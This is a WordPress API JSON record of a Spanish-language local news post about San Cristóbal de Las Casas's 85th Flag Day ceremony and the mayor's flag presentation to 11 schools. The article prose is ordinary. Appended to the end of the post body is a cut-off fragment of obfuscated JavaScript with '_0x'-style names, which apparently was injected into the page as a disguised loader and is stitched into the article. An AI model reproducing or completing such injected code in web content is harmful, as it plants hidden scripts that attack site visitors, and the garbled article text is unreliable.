{"id":20580,"date":"2025-02-25T04:58:08","date_gmt":"2025-02-25T04:58:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20580"},"modified":"2025-02-25T04:58:09","modified_gmt":"2025-02-25T04:58:09","slug":"ayuntamiento-de-san-cristobal-de-las-casas-conmemora-el-85-aniversario-del-dia-de-la-bandera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20580","title":{"rendered":"Ayuntamiento de San Crist\u00f3bal de Las Casas conmemora el 85 Aniversario del D\u00eda de la Bandera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"702\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067-1024x702.jpg\" alt=\"\" class=\"wp-image-20581\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067-1024x702.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067-300x206.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067-768x526.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0067.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 24 de febrero de 2025.- Con un acto solemne y lleno de patriotismo, el Ayuntamiento Municipal de San Crist\u00f3bal de Las Casas, encabezado por la Presidenta Municipal, Mtra. @Fabiola Ricci Diestel, llev\u00f3 a cabo la Ceremonia C\u00edvica en conmemoraci\u00f3n al 85 Aniversario del D\u00eda de la Bandera. El evento, organizado a trav\u00e9s de la Direcci\u00f3n de Educaci\u00f3n, tuvo lugar en la explanada de la Plaza de La Paz, donde tambi\u00e9n se realiz\u00f3 el abanderamiento de 11 instituciones educativas de nivel b\u00e1sico y media superior.<\/p>\n\n\n\n<p>Durante su discurso, la Presidenta Municipal destac\u00f3 la relevancia de este s\u00edmbolo patrio como un elemento de unidad, libertad y soberan\u00eda para todos los mexicanos. \u201cNuestra Bandera Nacional es un estandarte que nos representa sin distinci\u00f3n de procedencia, religi\u00f3n o condici\u00f3n social; es un s\u00edmbolo de nuestra historia, de nuestras luchas y de nuestros logros\u201d.<\/p>\n\n\n\n<p>Acompa\u00f1ada de regidoras, regidores, directores de las distintas \u00e1reas, directores de instituciones educativas y maestros, resalt\u00f3 el valor de la Bandera Nacional como emblema de solidaridad en tiempos de crisis y adversidad, reafirmando el compromiso del gobierno municipal con la seguridad y la paz en la comunidad. \u201cHonrar a nuestros s\u00edmbolos patrios implica tambi\u00e9n comprometernos a garantizar la seguridad y promover la convivencia pac\u00edfica en nuestro municipio\u201d.<\/p>\n\n\n\n<p>En el marco de la ceremonia, Fabiola Ricci realiz\u00f3 el abanderamiento de las escoltas de 11 instituciones educativas: Jard\u00edn de Ni\u00f1as y Ni\u00f1os Pascasio Gamboa, Jard\u00edn de Ni\u00f1as y Ni\u00f1os Mar\u00eda Adelina Flores Morales, Escuela Primaria 5 de Febrero, Escuela Primaria Aquiles Serd\u00e1n Alatriste, Escuela Primaria Josefa Ortiz de Dom\u00ednguez, Escuela Primaria Adolfo L\u00f3pez Mateos, Escuela Primaria Biling\u00fce 5 de Mayo de la Comunidad Coraz\u00f3n de Mar\u00eda, Escuela Telesecundaria 297 San Juan Bosco Occhiena, Escuela Telesecundaria San Felipe 211, Escuela Preparatoria del Estado No. 1 , y el Centro de Bachilleres de Chiapas Plantel 58, a quienes tom\u00f3 protesta representativa, enfatizando su deber de honrar y defender la Bandera Nacional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n San Crist\u00f3bal de Las Casas, 24 de febrero de 2025.- Con un acto solemne y lleno de patriotismo, el Ayuntamiento Municipal de San Crist\u00f3bal de Las Casas, encabezado por la Presidenta Municipal, Mtra. @Fabiola Ricci Diestel, llev\u00f3 a cabo la Ceremonia C\u00edvica en conmemoraci\u00f3n al 85 Aniversario del D\u00eda de la Bandera. El evento, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20581,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20580","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20580"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20580\/revisions"}],"predecessor-version":[{"id":20582,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20580\/revisions\/20582"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20581"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}